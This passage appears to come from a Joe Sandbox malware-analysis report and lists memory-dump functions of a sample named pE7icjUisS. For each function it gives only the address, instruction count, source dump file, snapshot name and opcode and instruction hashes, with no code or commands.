                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9aa6ec367fef8a9788857f7dfd88cb8b2af376ad634d66c22e8bc36b41bd0dca
                                                  • Instruction ID: 635c439497ad4b6445ba2bd5977fdcc9fb825140f3baf188c9d134d5c11db689
                                                  • Opcode Fuzzy Hash: 9aa6ec367fef8a9788857f7dfd88cb8b2af376ad634d66c22e8bc36b41bd0dca
                                                  • Instruction Fuzzy Hash: A011E2217082C09FC726977984653EE7FF2EFCA211B1544EFC485CB3A2D939894AC792
                                                  Function 014D1453 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 691be7ddb503b16aff196c60069c118eb054e2e1c4502518dc0dbc1ca69d29e4
                                                  • Instruction ID: 6ee824e6f9557890cd4318dd5ffaba77640af1075b6a99bb74ef443daea7b908
                                                  • Opcode Fuzzy Hash: 691be7ddb503b16aff196c60069c118eb054e2e1c4502518dc0dbc1ca69d29e4
                                                  • Instruction Fuzzy Hash: 9E119D31A002559BCF21EFB985701AE7BB5EF68620F2404BEDD46E7322E631C942CB91
                                                  Function 014D0838 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b6be9f18a845ce07183d2a89d2b7427c1db5dc0e70040d5502eaaa05a1d90d9
                                                  • Instruction ID: e056b4de620baa762a72483b1c989c7af3ee9da9a333b283fe8ceffdb0977f0f
                                                  • Opcode Fuzzy Hash: 4b6be9f18a845ce07183d2a89d2b7427c1db5dc0e70040d5502eaaa05a1d90d9
                                                  • Instruction Fuzzy Hash: 94119134A003048FEF265A7994653AB3665EB82255F10497FF406CB3A6E675CC418BD2
                                                  Function 014D0848 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bfce35480c7f62ea46fadbb1f677d47a8ee4c9ea70827baac030f3ce931ac1e1
                                                  • Instruction ID: f4a24b7e8e4bd8635aa3a325208919cf4a24858352010f8126fbd807eb087fe4
                                                  • Opcode Fuzzy Hash: bfce35480c7f62ea46fadbb1f677d47a8ee4c9ea70827baac030f3ce931ac1e1
                                                  • Instruction Fuzzy Hash: 84119438B003088BEF259A7AD46576B3255FB45250F10493BF106CF366DA71D8418BC1
                                                  Function 0144D006 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856027526.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_144d000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 029b676b91e43963e0245bb4c6701ef25c709c22f379441258daa52ceb2e6b83
                                                  • Instruction ID: 44de544d02008e46b4838e9663266d71a64e7d81564fe784cf3ff9595f3d93d7
                                                  • Opcode Fuzzy Hash: 029b676b91e43963e0245bb4c6701ef25c709c22f379441258daa52ceb2e6b83
                                                  • Instruction Fuzzy Hash: 8D2192755093808FDB17CF64D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                                  Function 014D1460 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8bb78d4474ec98cd3635bb5e5a2117d3c459042564ad4939e1a0fc600bf42a4
                                                  • Instruction ID: 7236c5c0b2b96b92e7fa43bd78827ccd36a6fe2df636c01d39cbd03f926abfec
                                                  • Opcode Fuzzy Hash: f8bb78d4474ec98cd3635bb5e5a2117d3c459042564ad4939e1a0fc600bf42a4
                                                  • Instruction Fuzzy Hash: E9016931A002159BCF21EFB985601AEBBF6EB58624F2404BFD805E7311E735C842CB95
                                                  Function 014D8179 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbdbddd687a71ee6b3f6b6b1d2d02f321112f3ba77504efd9160afe9f5e34532
                                                  • Instruction ID: 9aefc8ef01ac47631bb436894651bf6a5bb8005a090885bfe961aea5df5c8dce
                                                  • Opcode Fuzzy Hash: bbdbddd687a71ee6b3f6b6b1d2d02f321112f3ba77504efd9160afe9f5e34532
                                                  • Instruction Fuzzy Hash: E201F234A003948FDB26EBB5E88069C7FB1EB81306B0017DEC0004F19ADE312A07DB81
                                                  Function 014D8188 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52ee6b886ff8cc3a55968500356e2fb87b37d855b469c12adc192ed005310800
                                                  • Instruction ID: a5ec4dfd67374eed3c2706c95dbde16df935d55c2964c0660610671d418d13ae
                                                  • Opcode Fuzzy Hash: 52ee6b886ff8cc3a55968500356e2fb87b37d855b469c12adc192ed005310800
                                                  • Instruction Fuzzy Hash: AEF0A438A003189FDF15FFB9F88069CBBB5EB80302F0056A9C1049B258DF306E469B81

                                                  Non-executed Functions

                                                  Function 014DD1FB Relevance: 2.0, Instructions: 1995COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31f972cb6a5930bdfd6e5a86ca7fa30365f86845681ac6952b1a3aa51b09dba9
                                                  • Instruction ID: c696f9d453a92d1615005edd246a38cb9b925394c6daa49f082ce5d186d272a8
                                                  • Opcode Fuzzy Hash: 31f972cb6a5930bdfd6e5a86ca7fa30365f86845681ac6952b1a3aa51b09dba9
                                                  • Instruction Fuzzy Hash: 8123FB31D10A198ACB11EF68C8946A9F7B1FF99300F15C79AE449B7225EB70AAC5CF41
                                                  Function 06264FE0 Relevance: .5, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96dca16c05168ebe8caba15a2edb50350d09f809b5818b95462054592db1741b
                                                  • Instruction ID: 4a0fea0077fe3d7ce426420d03ee778ff9296d60696f3d51f582bb0850e4ce38
                                                  • Opcode Fuzzy Hash: 96dca16c05168ebe8caba15a2edb50350d09f809b5818b95462054592db1741b
                                                  • Instruction Fuzzy Hash: 18121130E1021ACFDB64DF66D85469EB7B2BF88305F208569E40AAB355DB71DD81CF90
                                                  Function 0626321F Relevance: .4, Instructions: 414COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c60651883d05fdd1e4447859231f7c1b7d30c2d1e129819dc384af0b42a3a7f
                                                  • Instruction ID: d0f685d068e79e161daa0fa72d7bea488d8e08530881286137b71f4148333d86
                                                  • Opcode Fuzzy Hash: 4c60651883d05fdd1e4447859231f7c1b7d30c2d1e129819dc384af0b42a3a7f
                                                  • Instruction Fuzzy Hash: 75E1E531B201158FDF54DB6AD494AAEBBF6FF89320F25846AE806DB351CA31DC81C790
                                                  Function 063A1128 Relevance: .3, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858415557.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_63a0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db8c060700ed885ce54e15eab82748ddccbee15ef14485539bd399b01c55e774
                                                  • Instruction ID: 9128bdfd8554294dd15b810e7deb39a4703b980f85693651c73537fd4791634d
                                                  • Opcode Fuzzy Hash: db8c060700ed885ce54e15eab82748ddccbee15ef14485539bd399b01c55e774
                                                  • Instruction Fuzzy Hash: 9C1275F1DD17458AD310CF66E94C18A7BB1BBC6328BD04B29D2612B2E1DBB415EACF44
                                                  Function 014D4190 Relevance: .3, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8af1d2f7549ff8e35214b789422375e09b25c64117e1c163bc382463385b2e6
                                                  • Instruction ID: 465d7574b9e44fad4cf1365868cba28b66c3af895f6154511c882430e5f1f8ec
                                                  • Opcode Fuzzy Hash: f8af1d2f7549ff8e35214b789422375e09b25c64117e1c163bc382463385b2e6
                                                  • Instruction Fuzzy Hash: 4CB13F70E00209CFDF14CFADD9957AEBBF2AF88314F18852AD415A77A4DB749885CB81
                                                  Function 063AF0B8 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858415557.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_63a0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b1ab205af3171252f09359549408819953279866a9b3f678a334c4b77bb5393
                                                  • Instruction ID: 31d02fc194e86f46e31d543641ecf5694d96a6526c22191ee61abc21c80f5957
                                                  • Opcode Fuzzy Hash: 7b1ab205af3171252f09359549408819953279866a9b3f678a334c4b77bb5393
                                                  • Instruction Fuzzy Hash: 8DA15832E103098FCF59DFB5C8445AEB7B6FF85300B15816EE816AB261DB31E916DB80
                                                  Function 063A1122 Relevance: .2, Instructions: 218COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858415557.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_63a0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c976cd451f761218a5bca8c5b98d8f6f80b11e1b1768efb753ded68c6cd5c531
                                                  • Instruction ID: e7eda1af37eccec7c18186aecc72900fbf78b8b31c75a3c9518054ca25d95e59
                                                  • Opcode Fuzzy Hash: c976cd451f761218a5bca8c5b98d8f6f80b11e1b1768efb753ded68c6cd5c531
                                                  • Instruction Fuzzy Hash: EDC1D6B1DD17458AD714CF66E84828A7BB1BBC6324FE04B29D2616B2D0DBB414EACF44